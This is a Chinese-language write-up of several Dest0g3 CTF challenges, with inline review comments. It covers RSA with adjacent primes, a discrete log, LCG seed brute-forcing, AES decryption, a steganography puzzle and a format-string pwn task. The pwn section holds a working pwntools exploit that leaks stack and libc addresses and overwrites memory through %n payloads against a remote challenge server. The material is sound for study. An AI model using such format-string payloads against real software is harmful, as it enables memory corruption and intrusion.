题目难度:萌新
题目脚本
from Crypto.Util.number import bytes_to_long, getPrime
from gmpy2 import next_prime
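p = getPrime(1024)
# q is the next prime after p, so p and q lie extremely close together.
# Moduli built from adjacent primes are easy to factor (Fermat's method
# recovers p and q almost instantly), which is presumably what lets the
# factoring tool used in the writeup succeed on a 2048-bit n. Real keys must
# generate p and q independently.
q = next_prime(p)
n = p*q
# Read the flag with a context manager so the handle is closed
# deterministically instead of being leaked.
with open('flag.txt', 'rb') as f:
    flag = f.read()
m = bytes_to_long(flag)
e = 65537
c = pow(m, e, n)
print(n)
print(c)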
'''
27272410937497615429184017335437367466288981498585803398561456300019447702001403165885200936510173980380489828828523983388730026101865884520679872671569532101708469344562155718974222196684544003071765625134489632331414011555536130289106822732544904502428727133498239161324625698270381715640332111381465813621908465311076678337695819124178638737015840941223342176563458181918865641701282965455705790456658431641632470787689389714643528968037519265144919465402561959014798324908010947632834281698638848683632113623788303921939908168450492197671761167009855312820364427648296494571794298105543758141065915257674305081267
14181751948841206148995320731138166924841307246014981115736748934451763670304308496261846056687977917728671991049712129745906089287169170294259856601300717330153987080212591008738712344004443623518040786009771108879196701679833782022875324499201475522241396314392429412747392203809125245393462952461525539673218721341853515099201642769577031724762640317081252046606564108211626446676911167979492329012381654087618979631924439276786566078856385835786995011067720124277812004808431347148593882791476391944410064371926611180496847010107167486521927340045188960373155894717498700488982910217850877130989318706580155251854
'''
解题步骤
题目p、q均为1024位随机素数,无法通过N值使用在线工具或factor等工具直接爆破p、q;但题目脚本中 q = next_prime(p),即 p、q 是相邻素数、数值非常接近,这正是 RsaCtfTool 能够由 n 分解出 p、q 的原因。所以本题采用RsaCtfTool工具,由公钥推算私钥,最后通过私钥解密。
1.使用RSA-CTF-TOOL生成公钥,用openssl验证
python3 RsaCtfTool.py --createpub -n 123456 -e 65537 (此处的 123456 仅为示例,实际应填题目给出的 n)
┌──(rootkali)-[/crypto/RsaCtfTool]
└─# openssl rsa -pubin -in pubaaa.key -text -modulus
RSA Public-Key: (2048 bit)
Modulus:
00:d8:0a:03:0d:98:de:84:0a:30:b5:3d:e5:d3:bc:
5a:f6:01:42:f6:19:4c:5e:33:6b:14:8b:83:5b:9f:
02:82:19:bd:02:81:1c:10:20:e0:a7:86:1e:5f:32:
d4:cb:5f:34:5f:35:52:f1:12:2a:36:ce:8b:02:69:
d1:1b:06:e2:00:2f:22:b7:ce:17:fd:a1:cd:f1:36:
01:0b:58:81:bb:bb:98:b2:3d:66:f5:ed:77:e9:1b:
33:ce:91:92:d3:a9:93:a4:33:d9:1c:eb:bf:d1:d8:
4c:f8:fe:61:81:0c:f1:6e:7a:7a:de:99:f8:cb:0e:
e9:80:fe:66:97:fe:35:d4:5f:09:97:48:c7:af:66:
c4:24:d8:e5:c5:2c:e5:31:9f:57:ce:5c:67:eb:dd:
bf:d8:62:86:6c:61:69:4a:20:d5:42:07:e4:55:12:
e2:e8:d2:21:dd:fa:e8:5b:c4:81:82:5d:e0:3c:75:
87:53:bd:2c:fc:96:c7:6f:79:d3:7b:c3:b9:53:10:
e0:65:2c:81:31:5d:c2:a1:74:19:03:cf:7a:92:5f:
e9:66:af:99:e4:cd:74:c0:97:f5:4d:e4:fc:8c:0b:
62:1c:39:65:f5:1f:1c:62:41:a4:c3:90:a8:09:f0:
35:16:df:79:90:94:bf:59:6d:0b:05:56:3d:97:6b:
8f:b3
Exponent: 65537 (0x10001)
Modulus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
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2AoDDZjehAowtT3l07xa
9gFC9hlMXjNrFIuDW58Cghm9AoEcECDgp4YeXzLUy180XzVS8RIqNs6LAmnRGwbi
AC8it84X/aHN8TYBC1iBu7uYsj1m9e136RszzpGS06mTpDPZHOu/0dhM+P5hgQzx
bnp63pn4yw7pgP5ml/411F8Jl0jHr2bEJNjlxSzlMZ9Xzlxn692/2GKGbGFpSiDV
QgfkVRLi6NIh3froW8SBgl3gPHWHU70s/JbHb3nTe8O5UxDgZSyBMV3CoXQZA896
kl/pZq+Z5M10wJf1TeT8jAtiHDll9R8cYkGkw5CoCfA1Ft95kJS/WW0LBVY9l2uP
swIDAQAB
-----END PUBLIC KEY-----
2.使用RSA-CTF-TOOL公钥转为私钥
python3 RsaCtfTool.py --publickey pubaaa.key --private
Private key :
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
┌──(rootkali)-[/crypto/RsaCtfTool]
3.由于数据过长,openssl无法解密,使用在线工具解密
RSA加密解密 - 爱资料工具
题目脚本
from Crypto.Util.number import *
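# Read the flag with a context manager so the handle is closed
# deterministically instead of being leaked.
with open('flag.txt', 'rb') as f:
    flag = f.read()
# The flag, as an integer, is the secret exponent of the discrete-log instance.
x = bytes_to_long(flag)
# Generator of the instance.
g = 19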
# Prime modulus (roughly 1000 decimal digits). NOTE(review): the writeup
# solves this instance directly with Sage's discrete_log, which at this size
# normally only succeeds when p-1 is smooth (Pohlig-Hellman); that is
# presumably the intended weakness -- confirm by factoring p-1.
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
# Public value h = g^x mod p; recovering x from (g, h, p) is the challenge.
h = pow(g, x, p)
print(h)
'''
h=199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
'''
解题步骤
题目给出h,g,p,其中h = pow(g, x, p),求x的值。计划用百度找的dlp算法,由于数据过大,没解出来,所以采用sage工具解题。sage 的 discrete_log 能在这种规模的 p 上直接解出,通常意味着 p-1 只含较小的素因子(可用 Pohlig–Hellman 分而治之),这应当就是本题的弱点所在。
Sage工具解题:
root@VM-24-9-ubuntu:/crypto# sage
┌────────────────────────────────────────────────────────────────────┐
│ SageMath version 9.4, Release Date: 2021-08-22 │
│ Using Python 3.9.5. Type "help()" for help. │
└────────────────────────────────────────────────────────────────────┘
sage:
/crypto/SageMath/local/lib/python3.9/site-packages/prompt_toolkit/renderer.py:514: DeprecationWarning: The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
await wait(coroutines, return_when=FIRST_COMPLETED)
sage: g = 19
sage: p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839
....: 8706416074121027468542576292268772483370029930234523854720581069440146534016470334561741269764748758590990237034729047357
....: 7921201082052493497273627688928108790916601742790582555350305064557593598058080389912222436887519772867751690727245204727
....: 8523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736
....: 5732468935880790335244761112686861389248920915757973299152408498628276217368328832155696879743684994366326174259227446589
....: 1224864447509713948578581936986760417691265285112318588481054417278594815833099125711856377273692910536012422284393013034
....: 7670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501
....: 371279295621820181402191463184275851324378938021156631501330660825566054528793444353
sage: h=19953330429662540695568394485633094025603785912614237241225474168967690259408338507180759458458964722503965085052487328
....: 9407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007
....: 7357075509147427495248189908433572174894334106479944178603749724680611102005545318199872048520474015392113006391654179949
....: 5560900293210437226658356946891560741552103592016994870426162532099018675491055178029042105740351278561797013890396787465
....: 1050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326
....: 5386071060896202010743310997135065361929570541730769133740984004893982281610890078981927797384399125956198136997110493802
....: 1392684911087723150306846439264881689118331811257073279251607661817414496884435128249799316492634633712131364400176219609
....: 8432060141494704659769545012678386821212213326455045335220435963683095439867976162
sage: x =discrete_log(h,mod(g,p))
sage: print(x)
627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133
sage:
libnum数字转字符直接解
import libnum
# The discrete log recovered in Sage is the flag as an integer; turn it back
# into bytes.
x = 627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133
print(libnum.n2s(x))
b'Dest0g3{07ed2a6f-182f-a05d-c81e-1318af820a78}'
题目采用LCG(线性同余生成器)算法
创建a,b,m三个随机数,32位随机seed,解密之前先爆破seed。
题目脚本
from Crypto.Util.number import *
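# Read the flag with a context manager so the handle is closed even if
# read() raises, instead of relying on an explicit close().
with open('flag.txt', 'r') as f:
    flag = f.read()
# Sanity check on the flag format.
assert flag[:8] == "Dest0g3{"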
class LCG:
    """Truncated linear congruential generator used by the challenge.

    The multiplier ``a``, increment ``b`` and prime modulus ``m`` are 32-bit
    values drawn at random, as is the 32-bit seed; only the upper bits of
    each state (``state >> 16``) are ever returned.
    """

    def __init__(self):
        # Everything is 32 bits wide; the small seed space is what the
        # writeup later brute-forces.
        self.a = getRandomNBitInteger(32)
        self.b = getRandomNBitInteger(32)
        self.m = getPrime(32)
        self.seed = getRandomNBitInteger(32)

    def next(self):
        """Advance the state once and return its upper bits (state >> 16)."""
        new_state = (self.seed * self.a + self.b) % self.m
        self.seed = new_state
        return new_state >> 16

    def output(self):
        """Print the parameters followed by the first two truncated outputs.

        Both calls to ``next`` advance the generator, so any keystream drawn
        afterwards starts at the third state.
        """
        header = "a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m)
        print(header)
        for label in ("state1", "state2"):
            print("{} = {}".format(label, self.next()))
lcg = LCG()
lcg.output()
# Each flag character is XORed with one keystream digit (state % 10, so only
# 0-9) and the single-byte results are concatenated; the ciphertext is then
# printed as one big integer.
c = b''.join(long_to_bytes(ord(ch) ^ (lcg.next() % 10)) for ch in flag)
print(bytes_to_long(c))
'''
a = 3939333498
b = 3662432446
m = 2271373817
state1 = 17362
state2 = 20624
600017039001091357643174067454938198067935635401496485588306838343558125283178792619821966678282131419050878
'''
解题代码
爆破随机seed, seed=104984523
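a = 3939333498
b = 3662432446
m = 2271373817


def find_seed(a, b, m, state1, state2, start=10000):
    """Recover an LCG seed from its first two truncated outputs.

    Candidate seeds are tried in increasing order from ``start + 1``. A
    candidate is reported with ``find`` when ``((a*seed + b) % m) >> 16``
    equals ``state1`` and with ``success`` when the following output also
    equals ``state2``; the first such seed is returned.

    Because the state update is reduced modulo ``m``, seeds that are congruent
    modulo ``m`` produce the same output stream, so trying ``m`` consecutive
    candidates covers every distinct stream -- the search is bounded instead
    of looping forever. Returns ``None`` if nothing in that range matches.
    """
    for seed in range(start + 1, start + 1 + m):
        tmp = (a * seed + b) % m
        if tmp >> 16 != state1:
            continue
        print(b'find ' + str(seed).encode())
        if (a * tmp + b) % m >> 16 == state2:
            print(b'success ' + str(seed).encode())
            return seed
    return None


if __name__ == "__main__":
    # The writeup reports seed = 104984523 for the challenge values; note
    # that 104984523 + m is a 32-bit value in the same residue class and
    # yields the identical stream.
    seed = find_seed(a, b, m, 17362, 20624)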
由于数据较小,爆破成功
解密脚本:
利用刚才的seed直接解密
from Crypto.Util.number import *
import libnum
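# Ciphertext of the challenge as a string, one character per flag byte
# (presumably libnum.n2s of the big integer the challenge printed). Each
# byte was XORed with a keystream digit 0-9, so XORing the same LCG stream
# back recovers the flag. The unused 'aaa' prefix constant was dropped.
flag='Agtp6b3zd15d3017-d71f-e<83$a6kj/b`f03325>b23~'
# Seed recovered by the brute-force script: 104984523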
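class LCG:
    """Replay of the challenge generator with the recovered parameters.

    ``a``, ``b`` and ``m`` are the values the challenge printed and ``seed``
    is the value recovered by brute force, so this instance reproduces the
    challenge's keystream exactly. The dead ``getRandomNBitInteger`` call
    (immediately overwritten in the original) and the commented-out code are
    removed, so the class no longer depends on a random source.
    """

    def __init__(self):
        self.a = 3939333498
        self.b = 3662432446
        self.m = 2271373817
        # Recovered seed; any value congruent to it modulo m gives the same
        # stream, because the state update is reduced modulo m.
        self.seed = 104984523

    def next(self):
        """Advance the state once and return its upper bits (state >> 16)."""
        self.seed = (self.a * self.seed + self.b) % self.m
        return self.seed >> 16

    def output(self):
        """Print the parameters and the first two outputs.

        Kept identical to the challenge script so the generator is advanced
        twice before decryption, exactly as it was during encryption.
        """
        print("a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m))
        print("state1 = {}".format(self.next()))
        print("state2 = {}".format(self.next()))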
lcg = LCG()
lcg.output()
# Replay the keystream: XOR with (state % 10) is its own inverse, so the same
# loop that encrypted the flag decrypts it.
c = b''.join(long_to_bytes(ord(ch) ^ (lcg.next() % 10)) for ch in flag)
print(libnum.n2s(bytes_to_long(c)))
b'Dest0g3{f21c7180-c35e-f912-e4bc-bfd235759a25}'
题目脚本
from Crypto.Cipher import AES
import os
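iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
# Read the flag with a context manager so the handle is closed
# deterministically instead of being leaked.
with open('flag.txt', 'rb') as f:
    flag = f.read()
# Zero padding up to the 16-byte block size (a full block of zeros is added
# when the length is already aligned). Unlike PKCS#7 this is not reversible
# if the plaintext itself ends in \x00, so the receiver has to strip the
# trailing zero bytes by hand.
flag += (16 - len(flag) % 16) * b'\x00'
c = my_aes.encrypt(flag)
print(c)
print(iv)
print(key)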
'''
b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
'''
解题代码
题目较为简单,直接解
from Crypto.Cipher import AES
import os
# IV and key exactly as the challenge printed them.
iv = b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
key = b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
# Ciphertext as printed by the challenge (three 16-byte blocks).
ciphertext = b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
my_aes = AES.new(key, AES.MODE_CBC, iv)
# The plaintext comes back with the challenge's zero padding still attached.
c = my_aes.decrypt(ciphertext)
print(c)
b'Dest0g3{d0e5fa76-e50f-76f6-9cf1-b6c2d576b6f4}\x00\x00\x00'
修改js文件,发现即使分数够了也不能获得flag。。。
查看源码 发现
Base64解码拿到一部分flag:4ee7-b673-971d81f8b177}
继续查看源码发现favicon.png,图片分离发现音频文件和加密的压缩包
分析音频,发现音频隐写采用拨号隐写和SSTV隐写
得到手机号码 13872908594
Kali linux 下使用qsstv 和 pavucontrol分析音频如下
扫描音频获得图片 password: md5(phone number)
用获取到的密码解开压缩包,拿到图片如下
通过gaps工具自动拼图,如下
gaps --image=part_flag.jpg --size=64 --save
获得拼图文件如下
组合起来base64解码即可
加上刚才的flag字符串拼到一起
Dest0g3{ed4d114f-9ee4-4ee7-b673-971d81f8b177}
题目主函数如下
输入被存入format变量,随后printf直接以format指向的数据作为格式化字符串输出;由于printf没有使用固定的格式串参数(格式串由用户输入控制),因此可泄露栈地址、libc地址、bss段地址等。
查看format、dword_4010均存储在bss段上,如下图
本题主要考察bss段上的格式化字符串
1.首先利用printf函数泄露栈地址、bss段上目标变量的位置、栈上指向bss段附近的指针。
2.将泄露的栈地址指向另一个栈地址,此处栈地址为指向bss段附近的指针,如下图。
3.将栈指针指向bss段的目标位置,即dword_4010,如下。
4.bss段dword_4010变量覆盖即可。
脚本如下:(计划用gadget打ret,由于题目没给libc,只能用常规操作)
from pwn import *
# Solve script for the format-string challenge. It talks to the challenge
# instance given to remote() and walks through the steps the writeup lists.
io=remote('node4.buuoj.cn',27720)
#io=process('./pwn')
context.log_level='debug'
# NOTE(review): this value is never read -- 'gadget' is reassigned below
# before its first use, so this line is dead.
gadget=0xcad1a
# Prompt the service prints before each read; used as the recv delimiter.
# NOTE(review): the name 're' shadows the stdlib 're' module (not imported
# here, but confusing to readers).
re=b'What about your love to Dest0g3?\n'
io.recvuntil(re)
# Step 1: leak payload; the values printed back are parsed just below.
payload=b'aaaaaaaa%1$p%9$p%10$p%16$p'
#payload=b'aaaaaaaa%1$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p'
io.sendline(payload)
#print(io.recv())
#gdb.attach(io)
# Each leaked value is the hex text up to the next '0x'; the last one runs
# to the end of the line.
io.recvuntil(b'aaaaaaaa0x')
aaaa_addr=io.recvuntil(b'0x')[:-2]
dest_addr=int(aaaa_addr,16)-0x50
bbbb_addr=io.recvuntil(b'0x')[:-2]
libc_addr=int(bbbb_addr,16)
cccc_addr=io.recvuntil(b'0x')[:-2]
stack_addr=int(cccc_addr,16)
stack_dest_addr=int(io.recvuntil(b'\n')[:-1],16)
# NOTE(review): bytes concatenation for logging; log.info with f-strings
# would read more easily.
print(b'dest_addr '+str(dest_addr).encode()+b' '+str(hex(dest_addr)).encode())
print(b'libc_addr '+str(libc_addr).encode()+b' '+str(hex(libc_addr)).encode())
print(b'stack_addr '+str(stack_addr).encode()+b' '+str(hex(stack_addr)).encode())
print(b'stack_dest_addr '+str(stack_dest_addr).encode()+b' '+str(hex(stack_dest_addr)).encode())
io.recvuntil(re)
#gdb.attach(io)
# Step 2 (see writeup).
#payload2=b'%'+str(dest_addr).encode()+b'c%1$hhn'
payload2=b'%'+str((stack_addr&0xffff)-32).encode()+b'c%10$hn\x00'
#payload2=b'aaaaaaaa%10$n'
#print(payload2)
io.sendline(payload2)
print(io.recvuntil(re))
#gdb.attach(io)
# Step 3 (see writeup), written in two halves (payload3 and payload5).
# NOTE(review): 'gadget' here holds the low bytes of dest_addr, not a ROP
# gadget -- the name is misleading.
gadget=dest_addr&0xffffff
payload3 = b'%'+str(gadget & 0xffff).encode()+b'c%39$hnxxxx\x00'
#payload3 =b'aaaaaaaa%39$p'
io.sendline(payload3)
print(io.recvuntil(re))
#gdb.attach(io)
# Step 4 (see writeup): the value written into the target variable.
num=1314520
payload4 = b'%'+str(num).encode()+b'c%35$n\x00'
print(payload4)
io.sendline(payload4)
#gdb.attach(io)
print(io.recvuntil(re))
#gdb.attach(io)
payload5 = b'%'+str((gadget>>16) & 0xffff).encode()+b'c%39$hhnxxxx\x00'
io.sendline(payload5)
print(io.recvuntil(re))
# Final input just to move the program on, then hand the session over.
payload6=b'aaaa'
io.sendline(payload6)
#print(io.recvuntil(re))
#gdb.attach(io)
#print(aaaa_addr)
#
# NOTE(review): the commented-out gdb.attach/print lines above are leftover
# debugging and could be removed from the final script.
io.interactive()
Dest0g3{3e06a44c-7cc7-4edd-9e34-ae693ea69a90}
其他的题目比较简单,就不放了。。。